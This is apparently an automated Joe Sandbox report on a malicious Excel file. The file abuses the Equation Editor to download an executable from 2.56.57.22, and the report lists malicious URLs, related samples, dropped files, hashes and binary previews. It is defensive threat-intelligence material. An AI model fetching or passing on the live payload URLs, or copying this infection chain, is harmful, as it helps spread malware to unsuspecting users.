http://2.56.57.22/droidttrre.exeP	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

⊘No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://2.56.57.22/yendexoriginwithoutfilter_rctcon218.bin	true		unknown
http://2.56.57.22/droidttrre.exe	true	12%, Virustotal, Browse Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://crl.certum.pl/ctsca2021.crl0o	EQNEDT32.EXE, 00000002.00000002.975232568.000000000056C000.00000004.00000020.00020000.00000000.sdmp, droidttrre[1].exe.2.dr, venxajlddf.exe.2.dr	false		high
http://creativecommons.org/licenses/by-sa/4.0/	folder-publicshare.png.4.dr	false		high
http://repository.certum.pl/ctnca.cer09	EQNEDT32.EXE, 00000002.00000002.975232568.000000000056C000.00000004.00000020.00020000.00000000.sdmp, droidttrre[1].exe.2.dr, venxajlddf.exe.2.dr	false		high
http://crl.thawte.com/ThawteTimestampingCA.crl0	venxajlddf.exe, 00000004.00000002.1181027714.0000000002B23000.00000004.00000800.00020000.00000000.sdmp, avutil-54.dll.4.dr	false		high
http://repository.certum.pl/ctsca2021.cer0	EQNEDT32.EXE, 00000002.00000002.975232568.000000000056C000.00000004.00000020.00020000.00000000.sdmp, droidttrre[1].exe.2.dr, venxajlddf.exe.2.dr	false		high
http://crl.certum.pl/ctnca.crl0k	EQNEDT32.EXE, 00000002.00000002.975232568.000000000056C000.00000004.00000020.00020000.00000000.sdmp, droidttrre[1].exe.2.dr, venxajlddf.exe.2.dr	false		high
http://subca.ocsp-certum.com05	EQNEDT32.EXE, 00000002.00000002.975232568.000000000056C000.00000004.00000020.00020000.00000000.sdmp, droidttrre[1].exe.2.dr, venxajlddf.exe.2.dr	false	URL Reputation: safe	unknown
http://www.symauth.com/rpa00	venxajlddf.exe, 00000004.00000002.1181027714.0000000002B23000.00000004.00000800.00020000.00000000.sdmp, avutil-54.dll.4.dr	false		high
http://2.56.57.22/droidttrre.exej	EQNEDT32.EXE, 00000002.00000002.975505837.00000000036D0000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://ocsp.thawte.com0	venxajlddf.exe, 00000004.00000002.1181027714.0000000002B23000.00000004.00000800.00020000.00000000.sdmp, avutil-54.dll.4.dr	false	URL Reputation: safe	unknown
http://subca.ocsp-certum.com02	EQNEDT32.EXE, 00000002.00000002.975232568.000000000056C000.00000004.00000020.00020000.00000000.sdmp, droidttrre[1].exe.2.dr, venxajlddf.exe.2.dr	false	URL Reputation: safe	unknown
http://www.nero.com	venxajlddf.exe, 00000004.00000002.1181027714.0000000002B23000.00000004.00000800.00020000.00000000.sdmp, avutil-54.dll.4.dr	false		high
http://subca.ocsp-certum.com01	EQNEDT32.EXE, 00000002.00000002.975232568.000000000056C000.00000004.00000020.00020000.00000000.sdmp, droidttrre[1].exe.2.dr, venxajlddf.exe.2.dr	false	URL Reputation: safe	unknown
http://2.56.57.22/droidttrre.exeooC:	EQNEDT32.EXE, 00000002.00000002.975219877.000000000054F000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://crl.certum.pl/ctnca2.crl0l	EQNEDT32.EXE, 00000002.00000002.975232568.000000000056C000.00000004.00000020.00020000.00000000.sdmp, droidttrre[1].exe.2.dr, venxajlddf.exe.2.dr	false		high
http://repository.certum.pl/ctnca2.cer09	EQNEDT32.EXE, 00000002.00000002.975232568.000000000056C000.00000004.00000020.00020000.00000000.sdmp, droidttrre[1].exe.2.dr, venxajlddf.exe.2.dr	false		high
http://www.avast.com0/	venxajlddf.exe, 00000004.00000002.1181027714.0000000002B23000.00000004.00000800.00020000.00000000.sdmp, lang-1045.dll.4.dr	false	URL Reputation: safe	unknown
http://2.56.57.22/droidttrre.exeP	EQNEDT32.EXE, 00000002.00000002.975232568.000000000056C000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://nsis.sf.net/NSIS_ErrorError	venxajlddf.exe, 00000004.00000000.963495241.000000000040A000.00000008.00000001.01000000.00000004.sdmp, venxajlddf.exe, 00000004.00000002.1180466472.000000000040A000.00000004.00000001.01000000.00000004.sdmp, droidttrre[1].exe.2.dr, venxajlddf.exe.2.dr	false		high
http://www.symauth.com/cps0(	venxajlddf.exe, 00000004.00000002.1181027714.0000000002B23000.00000004.00000800.00020000.00000000.sdmp, avutil-54.dll.4.dr	false		high
http://www.certum.pl/CPS0	EQNEDT32.EXE, 00000002.00000002.975232568.000000000056C000.00000004.00000020.00020000.00000000.sdmp, droidttrre[1].exe.2.dr, venxajlddf.exe.2.dr	false		high
https://github.com/dotnet/runtime	venxajlddf.exe, 00000004.00000002.1180707853.0000000002870000.00000004.00000800.00020000.00000000.sdmp, System.IO.FileSystem.Watcher.dll.4.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
2.56.57.22	unknown	Netherlands		395800	GBTCLOUDUS	true

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	635062
Start date and time: 27/05/202212:01:07	2022-05-27 12:01:07 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 22s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	#confirmaci#U00f3n+y+correcci#U00f3n+de+la+direccion.xls
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	5
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.evad.winXLS@4/21@0/1
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 86% (good quality ratio 84.7%) Quality average: 87.8% Quality standard deviation: 21.3%
HCA Information:	Successful, ratio: 100% Number of executed functions: 67 Number of non-executed functions: 31
Cookbook Comments:	Found application associated with file extension: .xls Adjust boot time Enable AMSI Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Active ActiveX Object Scroll down Close Viewer

Warnings

Exclude process from analysis (whitelisted): dllhost.exe
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
12:01:43	API Interceptor	121x Sleep call for process: EQNEDT32.EXE modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
2.56.57.22	SecuriteInfo.com.generic.ml.10062.exe	Get hash	malicious	Browse	2.56.57.22/yendexoriginwithoutfilter_rtSDhNF87.bin
2.56.57.22	triage_dropped_file.exe	Get hash	malicious	Browse	2.56.57.22/yendexoriginwithoutfilter_SHFjLjK121.bin

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
GBTCLOUDUS	0BHsRVjynk.exe	Get hash	malicious	Browse	2.56.57.124
	e6Epb4u1DY.exe	Get hash	malicious	Browse	2.56.57.124
	SPIER.dfh.exe	Get hash	malicious	Browse	2.56.56.88
	Dekont2200547712.exe	Get hash	malicious	Browse	2.56.59.101
	SecuriteInfo.com.generic.ml.10062.exe	Get hash	malicious	Browse	2.56.57.22
	MZvvoqAUnu.exe	Get hash	malicious	Browse	2.58.149.2
	SecuriteInfo.com.Trojan.DownloaderNET.386.13539.exe	Get hash	malicious	Browse	2.56.57.85
	scl7ieH12M.zip	Get hash	malicious	Browse	2.58.149.245
	LIST_OF_ITEMS.pdf.exe	Get hash	malicious	Browse	2.56.56.88
	34280976082022052523023453HesapOzeti.exe	Get hash	malicious	Browse	2.56.59.101
	SecuriteInfo.com.W32.AIDetectNet.01.32611.exe	Get hash	malicious	Browse	2.56.59.101
	MGZitJpdja	Get hash	malicious	Browse	45.11.15.117
	Caso2021113069001049.exe	Get hash	malicious	Browse	2.56.57.85
	CR2h8EQU7A.exe	Get hash	malicious	Browse	2.56.56.114
	oqMrsJR28L.exe	Get hash	malicious	Browse	2.58.149.2
	Swiftcopy.xlsx	Get hash	malicious	Browse	2.58.149.200
	PO_1529246.exe	Get hash	malicious	Browse	2.56.57.85
	Invoice.pdf.zip	Get hash	malicious	Browse	2.58.149.245
	Order Samples.exe	Get hash	malicious	Browse	2.56.57.124
	triage_dropped_file.exe	Get hash	malicious	Browse	2.56.57.22

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Local\Temp\MsMpLics.dll	SecuriteInfo.com.generic.ml.10062.exe	Get hash	malicious	Browse
	SecuriteInfo.com.generic.ml.10062.exe	Get hash	malicious	Browse
	ALuh1ODGq3.exe	Get hash	malicious	Browse
C:\Users\user\AppData\Local\Temp\ARMOURY CRATE eGPU Product.exe	SecuriteInfo.com.generic.ml.10062.exe	Get hash	malicious	Browse
	SecuriteInfo.com.generic.ml.10062.exe	Get hash	malicious	Browse
	ALuh1ODGq3.exe	Get hash	malicious	Browse
	https://3dhhmq.db.files.1drv.com/y4mE24U0E3kTbb1kcnfoE2lhRcOQikkRviwcr5fFIfVswsjrBcbqtNzvbkVurnoRkaA-hfd6G_MGgrcHzcoF1mJEjltHzMJxiu6bwMIRYpaPQH0vhHl0zFDF8Ykg57lX5pCK_o9CQ3XIEIIVsUI3WUMmLkQvqPfWsAB_d9i-3vVi2kQvC2suifY2gyahKqXE02URY3Boxt0pNArjvHnlQqYLg/PO00007852.ISO?download&psid=1	Get hash	malicious	Browse
	PO#23754-1.exe	Get hash	malicious	Browse
	PO#23754-1.exe	Get hash	malicious	Browse
	PO00007852.exe	Get hash	malicious	Browse
	PO00007852.exe	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\droidttrre[1].exe

Download File

Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	downloaded
Size (bytes):	1449584
Entropy (8bit):	7.9198763448081495
Encrypted:	false
SSDEEP:	24576:KY9Mbnf2VYqw1ubzB3Gk+VQOIT/DrboejxAseAb7pexIlu7T6SW4gjs2H:39Mbnf5+PwkEs/ToejptpeilqT6SL4
MD5:	2A384E15F8133C8B9ECEFA4DA1D96CEE
SHA1:	346475908F4F76A3C76D7E6D60E58DEBAB862DAA
SHA-256:	401BAE096C7E9DF1B24BF3A34E4A711A2C955700A8B719972B45BDFD10DDEBD2
SHA-512:	73E97BCB16362476259FC154E293EC2B0DAA9FF011902D406330EB3AF7352C9DEC6CBF4709C6C09BA7A0FC18E5FECC8F90D07C64A9F96B7ED071F12ECFCD4A30
Malicious:	true
Antivirus:	Antivirus: Metadefender, Detection: 32%, Browse Antivirus: ReversingLabs, Detection: 38%
Reputation:	low
IE Cache URL:	http://2.56.57.22/droidttrre.exe
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf._9..Pf..Pg.LPf._;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....Oa.................h...*......@6............@.................................[.....@.............................................h-..........P... ............................................................................................text...vf.......h.................. ..`.rdata...............l..............@..@.data...x...........................@....ndata...................................rsrc...h-..........................@..@................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\869A5E80.emf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	169096
Entropy (8bit):	3.369564690022728
Encrypted:	false
SSDEEP:	1536:WK83moqvL5TWvyvcSg2JjEeSxqLY5ml1re71NmWqnb11ruEA9TAe:WF3H2t4Sg2JjEWE5mSZB
MD5:	DCF8C56CAB759D132AD0B11703B8015C
SHA1:	C656AF02D26A18CE716A28C36B34BEE75D00E2B4
SHA-256:	38F17A599AC5D645DF3840BBB401710EF81573A747DA20ABBFC1B7D9A9273B58
SHA-512:	F6A9BAEA096279DBDBFD370B26899D259ED6B6DAFA8042594389523EA210CBECDC14ADD78AB7568E1C3EC8C0DF7AFCCAAD0ED7E22A879F6023C8317B6712973C
Malicious:	false
Reputation:	low
Preview:	....l...........[...y...........%...J... EMF................................@.......................0]..8...Q...............[...y...................\...z...P...(...x........... ...\...z...(...Z...z..... .......................................................................................................................]..V...e,..g...\ ..Q...[...M...]!..V...Q...W...\...h/..i1..Y...\...L...Y...^"..M..~G..}G..}F..}F..}F..}F..}F..\|F..\|F..\|F..\|F..\|F..\|F..\|F..\|F..\|F..\|F..\|F..\|F..\|F..\|F..\|F..\|F..\|F..\|F..\|F..\|F..\|F..\|F..\|F..\|F..\|F..\|F..\|F..\|F..\|F..\|F..\|F..\|F..\|F..}G...L......................................................................{{{..................................................................................................................................................................................................................................................................................................N...S...S...S...W...X...g...h0..Y...T...W...O...^"..b(..M...M..._$.

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\91FDCC81.png

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 731 x 391, 8-bit/color RGB, interlaced
Category:	dropped
Size (bytes):	114223
Entropy (8bit):	7.9934212565976415
Encrypted:	true
SSDEEP:	1536:cX9THBYT6A17j6ZE4+ZVkVIXMK7MpNc+Bj5uuUBQp12RTmmPHFSTm:QTHBq6U/6xVsMKgpNc+ZwuURRTd9STm
MD5:	7F72BA3C4366E5F9603DC0FE9C70D4E4
SHA1:	FA3DACFB4E2ECA8BFAFCCE8BE5ADE7EE7B3722F1
SHA-256:	4BD578FBCFC208744CFEC575FEC397A77AF66D5688E0C3CD034B4628EFDF910A
SHA-512:	B8B7B8D4441609F64AF477301355BC8DAE84A16EA595A4923391530F2EE6F4B3F85437541F6408398593D3E1223B56FFCEBEB119C43D97C6213C640799CA6863
Malicious:	false
Reputation:	low
Preview:	.PNG........IHDR...............9x....sRGB.........gAMA......a.....pHYs..........+......IDATx^......c7..7z.J !.@..ww.`..........-.......\|......d.g..........g...]....<.\.l/.......e...w..Q...\.y..qR.0.$&M.D..^....O...M.../...e.6....$..=..M.'a.@JQz.y.....4..a>p.....N.....>E."..z....C...U.W^..qc...Z.f.).........S.D.}...c...t.R.x..e..$...........T.i.&...+J.,...&!f%....;$.+!(.J...ZPe.....RJ..-.Q....l.v..._~.e).....T...a.w.......Jy..E1<>S.....q...T...Z.'.O)A....l..M...Qz.....=...I.3\|..}.Y.\|....9...6m.0<...q..+V<u......}.](..W_}.....,0U.......[....'.....]..L.2_\|..Y.-Z4....N)%A..o..&..{..e.H...../]..[..)..[....9.K...{.c.j-r..o......t.TA............q..q._}..].4...L..'K.fG..M........,. ....;.]C.[...4i.h......$I.t...E..5..x....>}....N..'L..}.....#+.~.H.N.8A.Pf.M.[.,Xp.%.$....n.:....(..$......N.J+.o.>t1n.8.......#R.{.....^...r..r+.{.I.7o.V.i.E@.....e.B}G\Dl....R.@..u......}..`j..n.8..J.a.g.\|-cc..v.Z..-._,Z..{...o..y.f.

C:\Users\user\AppData\Local\Temp\APPEASINGLY.ned

Download File

Process:	C:\Users\user\AppData\Roaming\venxajlddf.exe
File Type:	data
Category:	dropped
Size (bytes):	16931
Entropy (8bit):	7.988405091967319
Encrypted:	false
SSDEEP:	384:dCeKjNm3J3qfD2FyuSduqIl2nCFv5qkRWgkPTDw:d+Ne3qfSOAq82e51A4
MD5:	720AAF19A8588A7E668DB28B85FFD069
SHA1:	777C3CFB857DEDF40433390DE006825636D66785
SHA-256:	BDC7D0BE5DE4F77EFF2418C609B1BB6234894CF22985D3F2FDBEA18AF7EC4823
SHA-512:	703EE5D003E6BE338D48D15F36ED76727DA47A0CACD9448BE54CB671B92DE73EFBB572D58660F756A000C59AD6C8B57F88E881E057B8A4411382FE593199EB01
Malicious:	false
Reputation:	low
Preview:	.'pv...J........0d]"..M..J.hrk3.j.".A).x.-...Z.......J...A.<.6.n..6!.u.a....K.6..B....<..=.......K...\|....I...h......3.S.u........Z....'..m.<..S_)....O..F..7...Uw'.+.(....':..x.{.~Gn.f.R...%.6..C.l8..h.{.m...({z........X.}."k...4.K.f...]v...<.R..f..)........X9...7Zj...#c.?H.#P.f.....=.4.M.....;.....?.....`'j@..I.>....j."..5.....Yo...9..).......8Y.Gv.._..w\{.j....3+6...a....^..........8L.].9.n.q..C......V.{...FlY.-B.O.o-^.BYF..V.(&.k3..@G.}.F.4...J..E..Dsi....a.?i].I.+3.U....EQ...T..<l.7...[v..Sm.....-....?E.O.z[.0.T..)..vai..L:.....@=t........Z..d-.t..\....M.dXrix.!.O@...a]T.xw.Gag..P.,yR..<6r..]...b.'P.Zh. ....4...j.}...b...@..1..j...)bAa....Q...............1..=b...Ll.._.U.v.IT...5...\|o..X$%..x.......^..7F_%.1@G.L.J.m.:l.n.?.+...f...(..PZ.:l..T%<.....Cd..:......@.U........:T......E.d...\....=.lzO..^.....Z..5F..a...j8...rw. .Z.Y.D<7...I.V.N.....m...G.N ......5>..Ik.^..... .D.).j5%..-:.`K.6\$.......x..u7P##A. .-...T..........Pr..c?Wt^.'.Z

C:\Users\user\AppData\Local\Temp\ARMOURY CRATE eGPU Product.exe

Download File

Process:	C:\Users\user\AppData\Roaming\venxajlddf.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1955040
Entropy (8bit):	6.826653374498559
Encrypted:	false
SSDEEP:	49152:T3VwASOuGtlq2fIU6iFm7+BSGYsFoXOh5PGP1T/eacB4dPFPxat:vw+FDKXkuLPxS
MD5:	39981C2A1465413B506246DA3721D9A1
SHA1:	213C41C908F9A7C62C4D5D8079FC17188066CB3B
SHA-256:	19AE2C74ECE76F6AE7074AC31B198D6BF201DDE201B5B31EACA023877241F7B9
SHA-512:	F047681FF16D7C428E39D6A705BDD290B7EA227AC8176E69B989B90297541CD2A596B71673E6DFA0ACB83B201EB815E0518D52169D9FC48C6AEBF78DCB998D7D
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: SecuriteInfo.com.generic.ml.10062.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.generic.ml.10062.exe, Detection: malicious, Browse Filename: ALuh1ODGq3.exe, Detection: malicious, Browse Filename: , Detection: malicious, Browse Filename: PO#23754-1.exe, Detection: malicious, Browse Filename: PO#23754-1.exe, Detection: malicious, Browse Filename: PO00007852.exe, Detection: malicious, Browse Filename: PO00007852.exe, Detection: malicious, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8.}.k.}.k.}.k..Rk.}.k...j.}.k...j.}.k...j.}.k...j.}.k...j.}.k...j.}.k.}.k.\|.k.}.k.}.kg..j3\|.kf..j.}.kf.>k.}.k.}Vk.}.kf..j.}.kRich.}.k................PE..d....j.`.........."............................@.............................0...........`..................................................c...................................L.....p...........................@................ ...............................text............................... ..`.rdata..*j... ...l..................@..@.data...0e......."...z..............@....pdata..............................@..@.rsrc................b..............@..@.reloc...L.......N...h..............@..B........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\BD3.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	1536
Entropy (8bit):	1.1464700112623651
Encrypted:	false
SSDEEP:	3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//:rl912N0xs+CFQXCB9Xh9Xh9X
MD5:	72F5C05B7EA8DD6059BF59F50B22DF33
SHA1:	D5AF52E129E15E3A34772806F6C5FBF132E7408E
SHA-256:	1DC0C8D7304C177AD0E74D3D2F1002EB773F4B180685A7DF6BBE75CCC24B0164
SHA-512:	6FF1E2E6B99BD0A4ED7CA8A9E943551BCD73A0BEFCACE6F1B1106E88595C0846C9BB76CA99A33266FFEC2440CF6A440090F803ABBF28B208A6C7BC6310BEB39E
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Fecundify.lnk

Download File

Process:	C:\Users\user\AppData\Roaming\venxajlddf.exe
File Type:	MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hide
Category:	modified
Size (bytes):	932
Entropy (8bit):	3.117233192641325
Encrypted:	false
SSDEEP:	12:8wl0gYTXCG7GyuR+/fGWNiXKNM1Q18//NJkKAB3YilMMEpxRljK:8PSUqRQUKmqSVHAx3q
MD5:	C76D39C93A427005CB421071CAFC4B05
SHA1:	3E840AE2C2D7CE259EA622A6C0410A9E25A20C65
SHA-256:	3829F36B6A7395AFA6FE905974A1D6404A0251A7A1AE1FDBE9377B7F102A48A4
SHA-512:	90194C33717A394AD505D9A2168AE363F22DC4C1752A3F438DD918B8D16A3CAC25DB255933403C7D6D1EC5D2FBEADD74D3F869ADB4142916932F20A16D408773
Malicious:	false
Preview:	L..................F........................................................#....P.O. .:i.....+00.../C:\...................L.1...........Users.8.......................................U.s.e.r.s.....L.1...........user.8.......................................A.l.b.u.s.....R.1...........AppData.<.......................................A.p.p.D.a.t.a.....L.1...........Local.8.......................................L.o.c.a.l.....J.1...........Temp..6.......................................T.e.m.p.....t.2...........Unoppignorated.exe..R.......................................U.n.o.p.p.i.g.n.o.r.a.t.e.d...e.x.e...".......\.U.n.o.p.p.i.g.n.o.r.a.t.e.d...e.x.e.!.C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.........(.................l^".`G...3..qs................1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.................

C:\Users\user\AppData\Local\Temp\MsMpLics.dll

Download File

Process:	C:\Users\user\AppData\Roaming\venxajlddf.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	20008
Entropy (8bit):	6.8686823517057265
Encrypted:	false
SSDEEP:	384:xWgEHWp1v7S+10QnqiZwtfXbMpBjn0aq8f0DBRJYHClXLRXoS:nEijw8Be1PqspoS
MD5:	797476E8813090CC62D574BB9B59F2DD
SHA1:	BDBBBFD1B3B2E8B2CCF368815DCF06247FC08C14
SHA-256:	85C2314ECAA192D438DEBFAB7490E047C7780EB59A115DFEB68E36BF84CFAC22
SHA-512:	42A6AC5750DC4F8D533AD03098348732519AE27C0EE002C4B5953205D5108EAE24C09BFFD587874FCB1DA422152A5B71DD778B58BFA760683C0A565B09C7F936
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: SecuriteInfo.com.generic.ml.10062.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.generic.ml.10062.exe, Detection: malicious, Browse Filename: ALuh1ODGq3.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........<..R...R...R......R..P...R.Rich..R.PE..d....+............" .........................................................0.......c....`.......................................................... ..P...............(<..............8............................................................................rdata..............................@..@.rsrc...P.... ......................@..@.....+..........T...8...8........+..........$...................8....rdata..8...x....rdata$zzzdbg.... ..0....rsrc$01....0!.. ....rsrc$02.... ....n->..;..^.....=1.[.$H.m...+..........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\REPREHENSION.Deb

Download File

Process:	C:\Users\user\AppData\Roaming\venxajlddf.exe
File Type:	data
Category:	dropped
Size (bytes):	85246
Entropy (8bit):	6.4805953381180315
Encrypted:	false
SSDEEP:	768:yr5hV/bhHsCTDikGVVqs6z11oJ2eSBvENsTxnLn1DA/X+DgenbMPh6kxTmIH:yr31hG3qJKJ2eSBvENsTxL1DGUzn+6Rw
MD5:	DD5E10F58A7CE09C6522970C94A22F15
SHA1:	A6D30052B6501F26744F50E5A0D12075A9A7B5A6
SHA-256:	CE27CCC1A48E9FD81E590DDD15BA23A888B8853F112902C844AABBBFBCFC5925
SHA-512:	6E3EC39E076CA1936F5685CAC1903C3871382119E62C83B9AF55F288BCEECBFC552DE683EA61032255E3E7E12A6BBBF2041B14EAD26A907F1D1ECCCBBF795115
Malicious:	false
Preview:	............0l.*lZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ..y.....f.j....'..+A...................................f!.f.d...f...f.........&N.<V$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$...f.f...f....g...f..../].(]...........................................f......a.....g..$}..V>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>.............%.kw.................................W......f...f....,...eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee ........f......7+.hJYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY.....f.e...~....!;I.z"""""""""""""""""""""""""""""f....w...f.f....`..".&^.............................................2`...................................................f.r..f...f...f.h.....w.+..%H........................................0........f.e......15}Fz......................................................... b&]3............................ .f.k.....f............,,,,,,,,,,,,,,,,,,,,,,,,,...f.q.X..f.j...f.s...3,..+...............................................f.....f.....f.k..&..<^......

C:\Users\user\AppData\Local\Temp\System.IO.FileSystem.Watcher.dll

Download File

Process:	C:\Users\user\AppData\Roaming\venxajlddf.exe
File Type:	PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	71280
Entropy (8bit):	6.498681502225803
Encrypted:	false
SSDEEP:	1536:OOsuxD2ljgTCcxduILBZIdf7lgzd/I0bWBuMp/xj0:OMxyold9lZI7lOpI0bauH
MD5:	BBA87C141D8F08D86033E05DAAC57D5D
SHA1:	1EA5B7EE9B5C418FB4B15EE91F7524F5DB0D96D1
SHA-256:	EFD311B206AB942C188C3F83AEBE13AEF1D475CB5D822CF3B70AB162DCDC6FF7
SHA-512:	20581E2243E5FE63174EAB6A4424C6F3B06D5582984FBF35707C00813FF662F3232C06160A5365B14F1E7FD7D861CA1702B974B3C2D8DA5C3340D6588CA0C82C
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....\............" ......................................................... ......W.....`...@......@............... ..................................L...d(..........p$......p.......T...........................................................P...H............text............................... ..`.data...............................@....reloc..p...........................@..B............................................0.......................<.....4...V.S._.V.E.R.S.I.O.N._.I.N.F.O...................y.........?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n.........T.....S.t.r.i.n.g.F.i.l.e.I.n.f.o...0.....0.0.0.0.0.4.b.0.....d...C.o.m.m.e.n.t.s...I.n.t.e.r.n.a.l. .i.m.p.l.e.m.e.n.t.a.t.i.o.n. .p.a.c.k.a.g.e. .n.o.t. .m.e.a.n.t. .f.o.r. .d.i.r.e.c.t. .c.o.n.s.u.m.p.t.i.o.n... .P.l.e.a.s.e. .d.o. .n.o.t. .r.e.f.e.r.e.

C:\Users\user\AppData\Local\Temp\Undergangsstemningen.ini

Download File

Process:	C:\Users\user\AppData\Roaming\venxajlddf.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	34
Entropy (8bit):	4.256149238118269
Encrypted:	false
SSDEEP:	3:TFXV4ovxEun:Plv5n
MD5:	CEA246A40ED9A68F27EEC9458A18DEEF
SHA1:	3E210EBBD8F29926A51BA1074FAD9A22D53659D2
SHA-256:	2F37518683B8AA7E7C81B0F07A42B2A2692CA32FE4DEEB6618470A5EB245B2EC
SHA-512:	DD12CD2ECC855C0089E641986318FAF183E48798D5EE6F55BADF652186B8177D719FC2E631EF5C6353290827E96ADB59A715E3B82E956908D15012F01A91F9AB
Malicious:	false
Preview:	[Fortovsretter]..Tagged=SNIPPENS..

C:\Users\user\AppData\Local\Temp\avutil-54.dll

Download File

Process:	C:\Users\user\AppData\Roaming\venxajlddf.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	714072
Entropy (8bit):	6.248486521119856
Encrypted:	false
SSDEEP:	12288:1nBVHwA0eIjodibcTTMIVNQdqu8JbHfySBpHdiChBA:FBVJVNQoL1
MD5:	19ED470A232B01BB34B7F85288B017F0
SHA1:	4AE08D71FB45055FCCB0D86174150082A39881F1
SHA-256:	CF17BEE0C9479D7AAED9D3399E79FD89ED9535175C9AEEA73C54E48124D6C81A
SHA-512:	5EBC96C5B13A0D79C0C149C59E30AFC28AECC0FBA543A018551A1F83CEE0111EABAED8400B92694739A3734BDE64F23334BBEAEE28AACBC99358CCA075C82682
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
